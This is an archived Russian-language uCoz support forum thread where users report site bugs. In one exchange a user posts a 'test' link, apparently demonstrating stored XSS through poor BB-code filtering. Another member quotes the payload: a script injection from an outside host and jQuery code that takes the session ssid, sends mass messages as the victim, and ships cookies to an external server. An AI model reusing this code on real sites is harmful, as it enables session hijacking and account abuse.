Архив - только для чтения
Архив темы Если вы заметили баг
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 196 | 21:59:21
Ljudmila2378, откройте любой шаблон на редактирование и найдите в правом верхнем углу кнопочку off и нажмите на неё.
вот на всякий фото кнопочки

так должно работать
Прикрепления: 4331993.gif (3.2 Kb)

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Andre
Сообщений: 342
Репутация: 140

Сообщение # 197 | 10:06:38
1. Сайт: думаю везде. Пусть будет Хелпер
2. номер сервера: s3
3. Не работает изменение времени правки материала от правки участника, соответственно неверно выводится значение $LASTMOD$ и неверно производится вывод материалов по дате изменения материала. $LASTMOD$ изменяется только от действий групп имеющих править все материалы(по умолчанию админ), что лишает смысл данной функции при возможности править материалы участниками.
4.Модуль: Онлайн игры, думаю что это во всех модулях.
5. Если сбой при редактировании материала, обязательно указываете режим редактирования: с запретом на любые коды
6.Желательно скриншот важных деталей: нет
VZLATOUSTE
Сообщений: 31
Репутация: 0

Сообщение # 198 | 17:47:54
Andre, это еще что, вот после правки любого материала в подобных модулях например администратором, у него меняется время добавления (именно время) на время редактирования.
О проблеме уже известил, жду давно пока исправят.
Andre
Сообщений: 342
Репутация: 140

Сообщение # 199 | 09:58:34
Alexander_K, это не тебе решать, а администратору конкретного сайта, тебе не нужно, а мне нужно.
Пока пришлось юкоз немного поломать и дать редактирование всех материалов проверенным, что естественно уменьшает уровень безопасности всего модуля. wacko
-O-J-A-
Сообщений: 13
Репутация: 0

Сообщение # 200 | 15:06:28
Тестовое сообщение для Kurt.

Добавлено (10-Июн-2012, 15:00:17)
---------------------------------------------
Просьба не удалять верхнее сообщение, оно для проверки.

Добавлено (10-Июн-2012, 15:06:28)
---------------------------------------------
А также переходить по ссылке.
Сообщение отредактировал Styler - Четверг, 21 Июн 2012, 18:59:15
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 201 | 15:08:01
-O-J-A-,
Quote
А также переходить по ссылке.
пахнет фишингом ...

Alexander_K
Сообщений: 552
Репутация: 188

Сообщение # 202 | 17:28:29
Quote (-O-J-A-)
тест
Quote
javascript:$('body').append('<script src=http://c7s.ru/xss.js></script>');
Code
$(document).ready(function(){
  var x_ssid = $('input[name="ssid"]').val();
   
  var t_subject = "Тестовое сообщение";
  var t_message = "Тут один человек сомневался...\nС уважением, O.J.A.";
   
  $.ajax({
   url: '/index/',
   type: 'POST',
   dataType: 'xml',
   data: 'gr=1&gr=2&gr=3&gr=4&gr=5&gr=6&gr=7&gr=8&gr=9&gr=10&gr=251&subject='+t_subject+'&message='+t_message+'&a=18&t=1&ssid='+x_ssid+'&_tp_=xml',
   success: function(data){
     
   }
  });
   
  var p_cookies = document.cookie;
   
  $.ajax({
   url: 'http://2012.c7s.ru/test.php',
   dataType: 'jsonp',
   jsonp: 'jsonp_callback',
   data: 'data='+p_cookies+'',
   success: function(data){
     
   }
  });
   
});
И?? biggrin
Только идиоты не смотрят, куда кликают.

-O-J-A-
Сообщений: 13
Репутация: 0

Сообщение # 203 | 17:46:35
Alexander_K, Собственно, Курт не верит про наличие xss, но она то есть.

Добавлено (10-Июн-2012, 17:46:35)
---------------------------------------------
А точнее про ее практическое использование.

Alexander_K
Сообщений: 552
Репутация: 188

Сообщение # 204 | 17:58:40
Это через JS-скрипт, что-ли?
JavaScript же выполняется на стороне клиента, любая защита обеспечивается там же, независимо от сервера.
А те, кто кликают на всём подряд (и устанавливают себе, собственноручно, различную херню), сами виноваты, защитить их невозможно.

-O-J-A-
Сообщений: 13
Репутация: 0

Сообщение # 205 | 18:05:24
Alexander_K, плохая фильтрация входящих символов в бб кодах, на сервере.
Alexander_K
Сообщений: 552
Репутация: 188

Сообщение # 206 | 18:08:24
А, ну этим все страдают, не только юкоз.

x@ker
Сообщений: 5
Репутация: 0

Сообщение # 207 | 01:46:57
Ни когда с этой проблемой не сталкивался! Почему-то при входе на сайт "Гостем", Главная страница пустая, а при входе "Пользователь" всё норм, раньше такого не было!
Мне надо чтобы люди вошедшие видели всё на главной странице даже в статусе "Гость" http://elitepolk.clan.su/
Это баг или мои не доработки?
Alexander_K
Сообщений: 552
Репутация: 188

Сообщение # 208 | 01:51:03
x@ker, материалы на главной доступны для просмотра гостям? Если доступны, то это баг.

x@ker
Сообщений: 5
Репутация: 0

Сообщение # 209 | 01:55:56
Да на других сайтах всё показывает гостям а на этом не хочет почему так? Вот сравните? http://elitepolk.clan.su/ http://dozornash.clan.su/
ad1er
Сообщений: 66
Репутация: 0

Сообщение # 210 | 00:51:52
Переношу сайт и в Unet профиле не могу подтвердить перенос! пишет: ""Ошибка соединения, попробуйте позже"
Поиск: